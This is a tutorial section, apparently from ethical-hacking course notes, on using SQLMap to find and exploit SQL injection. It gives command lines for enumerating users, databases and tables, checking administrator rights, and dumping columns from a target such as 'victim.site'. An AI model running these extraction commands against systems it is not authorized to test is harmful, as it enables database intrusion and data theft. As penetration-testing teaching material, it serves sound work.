5.4.6 SQLMap

SQLMap

SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.

Basic Syntax

• Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:

  $ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U

  This command tells SQLMap to test the id parameter of a GET request for view.php using a Union-based SQL injection technique.

• Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:

  $ sqlmap -u <URL> --data=<POST string> -p parameter [options]

  You can write the POST string manually or copy it from a request intercepted with Burp Proxy.

• Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:

  $ sqlmap -r <request file> -p parameter [options]

Extracting Information

• Database Banner: The --banner switch helps in grabbing the database banner to test injection and include proof of exploitability in reports:

  $ sqlmap -u <target> --banner <other options>

• Information Gathering:

  • List users of the database:

    $ sqlmap -u <target> --users <other options>

  • Check if the web application database user is a database administrator:

    $ sqlmap -u <target> --is-dba <other options>

• Database and Schema Extraction:

  • List all available databases:

    $ sqlmap -u <target> --dbs <other options>

  • Choose a database and list its tables:

    $ sqlmap -u <target> -D <database> --tables <other options>

  • Choose tables and list their columns:

    $ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>

  • Dump specific columns:

    $ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>

SQLMap Advanced Usage

• Forcing the DBMS: Specify the DBMS to help shorten the detection phase:

  $ sqlmap --dbms=<DBMS> ...

  Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.

• Fine-Tuning Payloads: Use --string and --not-string to handle changes in application output. For example:

  $ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>

  Utilize --prefix and --suffix for structured POST parameters.

• Aggressiveness and Load:

  • Use --level to test headers and increase the number of columns tested for in-band exploitation.

  • Use --risk to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.

• Connection Management:

  • Use --keep-alive for persistent connections:

    $ sqlmap -u <target> --keep-alive <other commands>

  • Use --threads to exploit injections with parallel threads:

    $ sqlmap -u <target> --technique=8 --threads 7 <other commands>

• SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.

• Understanding the tools and their options is crucial for successful and responsible penetration testing.

• SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.

• Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.

BurpSuite & SQLMap

A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).

We will then open that file with SQLMap and check for vulnerabilities or not.

sqlmap -r sql_request_captured.xml 

SQLMapPractical Ethical Hacker (CEH) Tools